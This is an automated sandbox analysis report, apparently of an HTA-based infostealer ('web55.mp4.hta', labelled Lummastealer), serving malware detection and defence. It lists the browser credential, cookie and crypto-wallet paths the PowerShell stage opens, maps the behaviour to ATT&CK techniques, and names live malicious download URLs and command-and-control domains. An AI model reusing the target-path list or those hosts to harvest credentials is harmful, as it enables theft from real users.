                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7508, type: MEMORYSTR
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                11
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                1
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts111
                Process Injection
                21
                Deobfuscate/Decode Files or Information
                LSASS Memory23
                System Information Discovery
                Remote Desktop Protocol41
                Data from Local System
                21
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts5
                PowerShell
                Logon Script (Windows)Logon Script (Windows)4
                Obfuscated Files or Information
                Security Account Manager311
                Security Software Discovery
                SMB/Windows Admin Shares1
                Screen Capture
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Software Packing
                NTDS1
                Process Discovery
                Distributed Component Object Model1
                Email Collection
                114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Timestomp
                LSA Secrets231
                Virtualization/Sandbox Evasion
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job231
                Virtualization/Sandbox Evasion
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585911 Sample: web55.mp4.hta Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 50 web.klipdywoziy.shop 2->50 52 quinceisoz.cam 2->52 54 bigadcompany.com 2->54 70 Suricata IDS alerts for network traffic 2->70 72 Found malware configuration 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 15 other signatures 2->76 13 mshta.exe 1 2->13         started        signatures3 process4 signatures5 98 Suspicious powershell command line found 13->98 16 powershell.exe 13 13->16         started        process6 signatures7 60 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 16->60 62 Suspicious powershell command line found 16->62 64 Found many strings related to Crypto-Wallets (likely being stolen) 16->64 66 4 other signatures 16->66 19 cmd.exe 1 16->19         started        22 conhost.exe 16->22         started        process8 signatures9 78 Suspicious powershell command line found 19->78 80 Encrypted powershell cmdline option found 19->80 24 powershell.exe 7 19->24         started        process10 signatures11 90 Encrypted powershell cmdline option found 24->90 27 powershell.exe 12 24->27         started        30 conhost.exe 24->30         started        process12 signatures13 92 Suspicious powershell command line found 27->92 32 powershell.exe 15 15 27->32         started        process14 dnsIp15 48 web.klipdywoziy.shop 188.114.97.3, 443, 49706 CLOUDFLARENETUS European Union 32->48 68 Injects a PE file into a foreign processes 32->68 36 powershell.exe 1 32->36         started        41 conhost.exe 32->41         started        signatures16 process17 dnsIp18 56 quinceisoz.cam 104.21.112.1, 443, 49977, 49978 CLOUDFLARENETUS United States 36->56 58 bigadcompany.com 192.250.235.30, 443, 49985 CNSV-LLCUS United States 36->58 46 C:\Users\...\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, PE32+ 36->46 dropped 82 Query firmware table information (likely to detect VMs) 36->82 84 Found many strings related to Crypto-Wallets (likely being stolen) 36->84 86 Tries to harvest and steal ftp login credentials 36->86 88 2 other signatures 36->88 43 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe 36->43         started        file19 signatures20 process21 signatures22 94 Multi AV Scanner detection for dropped file 43->94 96 Found many strings related to Crypto-Wallets (likely being stolen) 43->96

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                web55.mp4.hta2%VirustotalBrowse
                web55.mp4.hta0%ReversingLabs
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe42%ReversingLabsByteCode-MSIL.Spyware.Lummastealer
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://defaultcontainer/Assaac;component/app.xaml0%Avira URL Cloudsafe
                crowdwarek.shop100%Avira URL Cloudmalware
                robinsharez.shop100%Avira URL Cloudmalware
                https://web.klipdywoziy.shop/kunnar.png0%Avira URL Cloudsafe
                http://foo/Picture/pic_good.png0%Avira URL Cloudsafe
                https://bigadcompany.com/Assaac.exeebKit/537.360%Avira URL Cloudsafe
                http://foo/bar/picture/pic_good.png0%Avira URL Cloudsafe
                http://foo/bar/picture/img_cake.png0%Avira URL Cloudsafe
                versersleep.shop100%Avira URL Cloudmalware
                http://scripts.sil.org/OFLhttp://scripts.sil.org/OFLOpen0%Avira URL Cloudsafe
                http://foo/bar/picture/pic_tiz.ico0%Avira URL Cloudsafe
                http://foo/Picture/pic_tiz.ico0%Avira URL Cloudsafe
                https://bigadcompany.com/Assaac.exe4c0%Avira URL Cloudsafe
                quinceisoz.cam0%Avira URL Cloudsafe
                https://bigadcompany.com/Assaac.exe100%Avira URL Cloudmalware
                femalsabler.shop100%Avira URL Cloudmalware
                http://defaultcontainer/Assaac;component/Picture/img_cake.png0%Avira URL Cloudsafe
                https://bigadcompany.com/t_0%Avira URL Cloudsafe
                http://defaultcontainer/Assaac;component/Picture/pic_good.png0%Avira URL Cloudsafe
                http://foo/bar/app.baml0%Avira URL Cloudsafe
                https://bigadcompany.com/0%Avira URL Cloudsafe
                http://defaultcontainer/Assaac;component/MainWindow.xaml0%Avira URL Cloudsafe
                http://defaultcontainer/Assaac;component/Picture/pic_tiz.ico0%Avira URL Cloudsafe
                soundtappysk.shop100%Avira URL Cloudmalware
                apporholis.shop100%Avira URL Cloudmalware
                http://foo/bar/mainwindow.baml0%Avira URL Cloudsafe
                handscreamny.shop100%Avira URL Cloudmalware
                http://foo/MainWindow.xaml0%Avira URL Cloudsafe
                https://quinceisoz.cam/api0%Avira URL Cloudsafe
                https://web.klipdywoziy.shop0%Avira URL Cloudsafe
                chipdonkeruz.shop100%Avira URL Cloudmalware
                https://bigadcompany.com/L_0%Avira URL Cloudsafe
                http://foo/app.xaml0%Avira URL Cloudsafe
                http://crl.microsoftJn90%Avira URL Cloudsafe
                http://foo/Picture/img_cake.png0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                bigadcompany.com
                192.250.235.30
                truefalse
                  unknown
                  web.klipdywoziy.shop
                  188.114.97.3
                  truetrue
                    unknown
                    quinceisoz.cam
                    104.21.112.1
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      robinsharez.shoptrue
                      • Avira URL Cloud: malware
                      unknown
                      versersleep.shoptrue
                      • Avira URL Cloud: malware
                      unknown
                      crowdwarek.shoptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://web.klipdywoziy.shop/kunnar.pngtrue
                      • Avira URL Cloud: safe
                      unknown
                      quinceisoz.camtrue
                      • Avira URL Cloud: safe
                      unknown
                      https://bigadcompany.com/Assaac.exefalse
                      • Avira URL Cloud: malware
                      unknown
                      femalsabler.shoptrue
                      • Avira URL Cloud: malware
                      unknown
                      soundtappysk.shoptrue
                      • Avira URL Cloud: malware
                      unknown
                      apporholis.shoptrue
                      • Avira URL Cloud: malware
                      unknown
                      handscreamny.shoptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://quinceisoz.cam/apitrue
                      • Avira URL Cloud: safe
                      unknown
                      chipdonkeruz.shoptrue
                      • Avira URL Cloud: malware
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://defaultcontainer/Assaac;component/app.xaml2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A583E1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://foo/Picture/pic_good.png2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A58514000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://rsms.me/This2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000000.2302983309.0000026A56552000.00000002.00000001.01000000.0000000E.sdmp, 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe.19.drfalse
                        high
                        http://foo/bar/picture/pic_good.png2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000002.3706098703.0000026A58514000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://contoso.com/Licensepowershell.exe, 0000000D.00000002.2173513151.0000000005B3E000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
